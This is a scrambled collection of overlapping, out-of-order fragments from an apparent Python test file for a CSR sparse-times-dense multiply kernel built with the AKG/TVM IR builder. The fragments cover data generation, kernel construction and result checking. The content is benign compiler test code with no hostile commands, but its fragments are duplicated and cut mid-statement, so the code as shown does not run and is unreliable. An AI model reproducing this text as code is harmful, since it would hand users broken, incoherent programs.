< len(broadcast_shape))", "attrs = {\"target\": \"cuda\"} # gen data op_attrs = [shape2] dense, sparse_data, col_idx,", "from akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import", "AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect],", "from akg import topi from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from", "[shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape =", "pos, val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense,", "row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start =", ") output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output),", "the same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape =", "topi from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor", "+ 1) with ib.for_range(0, end - start, name='j') as j: pos = start", "ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col])) with ib.else_scope(): with", "sparse_data.dtype, \"data and weight must have the same dtype\" num_rows = row_idx.shape[0] -", "< end): val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output,", "j: pos = start + j with ib.if_scope(pos < end): val = ib.load(sparse_data,", "with ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with", "ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i,", "utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\")", "attrs[\"target\"].split()[0] if not res: mod_source = mod if target_name != \"llvm\": mod_source =", "if not res: mod_source = mod if target_name != \"llvm\": mod_source = mod.imported_modules[0]", "ib.store(output, pos, val * ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\" +", "= compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name =", "utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res", "[shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if", "ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col]))", "dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if", "== len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib", "= tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] <", "from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from", "dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1, )", "return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None):", "ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\" +", "+ j with ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col = ib.load(col_idx,", "if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0))", "sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs", "ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val", "* ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0,", "tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]),", "data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1,", "op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2)", "and weight must have the same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape", "dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape =", "sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"]", "= tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape)", "+ dense.op.name + \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape],", "return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3],", "sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2,", "assert len(shape) == 2, \"only supports 2-dim sparse tensor\" assert len(dense.shape) <= 2", "need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data,", "output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect)", "import compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling from", "def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2,", "gen data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2,", "= [shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape", "kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from", "get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec", "= tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx, i) end", "dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1])", "sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not", "get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const(", "len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output):", "i: start = ib.load(row_idx, i) end = ib.load(row_idx, i + 1) with ib.for_range(0,", "sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2,", "akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array,", "output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\",", "res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source = mod if", "* ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense,", "= start + j with ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col", "= scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data,", "0: output_shape = (1, ) output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense,", "ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense =", "from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) ==", "need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0]", "mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense,", "tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx,", "return ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name out_buf =", "1) with ib.for_range(0, end - start, name='j') as j: pos = start +", "sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf],", "col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0])) with", "tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0],", "expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape],", "scipy.sparse import akg from akg import tvm from akg import topi from tests.common.base", "not attrs: attrs = {\"target\": \"cuda\"} # gen data op_attrs = [shape2] dense,", "ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col])) return", "<= 2 assert dense.dtype == sparse_data.dtype, \"data and weight must have the same", "val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense,", "\"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx,", "expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs =", "atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\"", "{\"target\": \"cuda\"} # gen data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect", "val * ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name +", "akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx,", "dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data =", "dtype2, poly_sch=False, attrs=None): if not attrs: attrs = {\"target\": \"cuda\"} # gen data", "tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) ==", "outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data", "from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape", "output_shape = (1, ) output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data,", "import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils from", "= row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape,", "shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs,", "end): val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos,", "import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import", "to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0)) target_profiling(mod, *args_list, target=target_name, repeat_time=attrs[\"repeat_time\"])", "akg import topi from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio", "with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col])) return ib.get() output_name =", "expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2,", "col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) ==", "sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim", "= \"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name)", "\"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list", "= attrs[\"target\"].split()[0] if not res: mod_source = mod if target_name != \"llvm\": mod_source", "shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2),", "dense.op.name + \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense,", "== 2, \"only supports 2-dim sparse tensor\" assert len(dense.shape) <= 2 assert dense.dtype", "mod if target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test", "if len(expect.shape) == 0: output_shape = (1, ) output = np.zeros(output_shape, expect.dtype) output", "row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0:", "import tvm from akg import topi from tests.common.base import get_rtol_atol from tests.common.gen_random import", "shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1)", "sparse_data, col_idx, row_idx, shape): assert len(shape) == 2, \"only supports 2-dim sparse tensor\"", "import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) == 2, \"only", "supports 2-dim sparse tensor\" assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data", "sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i:", "row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol,", "pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim):", "[i, col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name", "row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape)", "dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense,", "= sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1,", "= ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val *", "sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs:", "import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape):", "ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output,", "col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name out_buf", "= gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0]", "= sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1,", "gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2):", "have the same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape", "rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not", "val * ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val *", "get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape)", "tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx, i) end =", "ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1)", "== sparse_data.dtype, \"data and weight must have the same dtype\" num_rows = row_idx.shape[0]", "sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda", "ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand):", "compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0]", "if target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\")", "import scipy.sparse import akg from akg import tvm from akg import topi from", "fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name,", "- start, name='j') as j: pos = start + j with ib.if_scope(pos <", "sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output,", "ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2,", "row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0]", "* ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\"", "density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data", "target_name = attrs[\"target\"].split()[0] if not res: mod_source = mod if target_name != \"llvm\":", "num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape =", "\"data and weight must have the same dtype\" num_rows = row_idx.shape[0] - 1", "ib.store(output, pos, val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val *", "name='j') as j: pos = start + j with ib.if_scope(pos < end): val", "import numpy as np import scipy.sparse import akg from akg import tvm from", "np import scipy.sparse import akg from akg import tvm from akg import topi", "from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx,", "[col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col])) with", "end = ib.load(row_idx, i + 1) with ib.for_range(0, end - start, name='j') as", "dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1,", "from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as", "with ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx, i) end = ib.load(row_idx,", "= (1, ) output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx,", "= ib.load(row_idx, i + 1) with ib.for_range(0, end - start, name='j') as j:", "broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape)", "utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import", "out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0],", "with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos,", "col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with", "col_idx, row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start", "dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1,", "np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol", "gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod", "mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list =", "ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\"", "\"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return", "broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense,", "= {\"target\": \"cuda\"} # gen data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx,", "len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1]", "i) end = ib.load(row_idx, i + 1) with ib.for_range(0, end - start, name='j')", "as np import scipy.sparse import akg from akg import tvm from akg import", "dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect =", "= tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx,", "def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i')", "random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis", "import topi from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import", "dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs = {\"target\": \"cuda\"} # gen", "to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert", "= tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs:", "{}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx,", "len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape)", "expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test", "[dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape", "pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col]))", "dense.dtype == sparse_data.dtype, \"data and weight must have the same dtype\" num_rows =", "ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope(): with", "[0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0]))", "res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name", "if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source = mod", "len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib =", "2 assert dense.dtype == sparse_data.dtype, \"data and weight must have the same dtype\"", "tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0])", "0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col])) return ib.get() output_name", "\"cuda\"} # gen data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect =", "sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1],", "attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0)) target_profiling(mod,", "// shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2],", "out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins,", "mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch,", "ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx, i) end = ib.load(row_idx, i", "polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1, ) output =", "+ \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data,", "dtype\" num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape", "tensor\" assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data and weight must", "akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) == 2,", "with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim):", "col_idx, row_idx, shape): assert len(shape) == 2, \"only supports 2-dim sparse tensor\" assert", "# gen data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1,", "res: mod_source = mod if target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name))", "as j: pos = start + j with ib.if_scope(pos < end): val =", "tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils", "row_idx, shape): assert len(shape) == 2, \"only supports 2-dim sparse tensor\" assert len(dense.shape)", "val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i,", "= utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, 